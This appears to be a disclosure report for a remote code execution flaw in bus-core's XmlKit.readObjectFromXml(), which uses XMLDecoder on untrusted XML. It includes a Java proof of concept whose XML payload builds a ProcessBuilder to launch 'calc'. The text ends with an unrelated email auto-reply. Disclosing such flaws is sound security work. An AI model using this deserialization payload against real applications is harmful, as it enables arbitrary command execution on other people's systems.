Remote Code Execution caused by XmlUtils.readObjectFromXml() via untrusted XML String

[Alex111998]

Description

bus-core provides XML utility classes that may be vulnerable to remote code execution when using XmlKit.readObjectFromXml() to interpret untrusted XML strings.

---

Detail

The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability.

---

Version

<= 8.0.0

---

POC

    import org.aoju.bus.core.toolkit.XmlKit;
    import org.xml.sax.InputSource;
    
    import java.io.StringReader;
    
    public class MyTest {
    
        private static final String XML_STR = "<java>\n" +
            "    <object class=\"java.lang.ProcessBuilder\">\n" +
            "        <array class=\"java.lang.String\" length=\"1\">\n" +
            "            <void index=\"0\">\n" +
            "                <string>calc</string>\n" +
            "            </void>\n" +
            "        </array>\n" +
            "        <void method=\"start\"></void>\n" +
            "    </object>\n" +
            "</java>\n";
    
        public static void main(String[] args) {
            XmlKit.readObjectFromXml(new InputSource(new StringReader(XML_STR)));
        }
    }

---

Attack

[839536]

Thank you. Your email is received and will be handled  as soon as possible.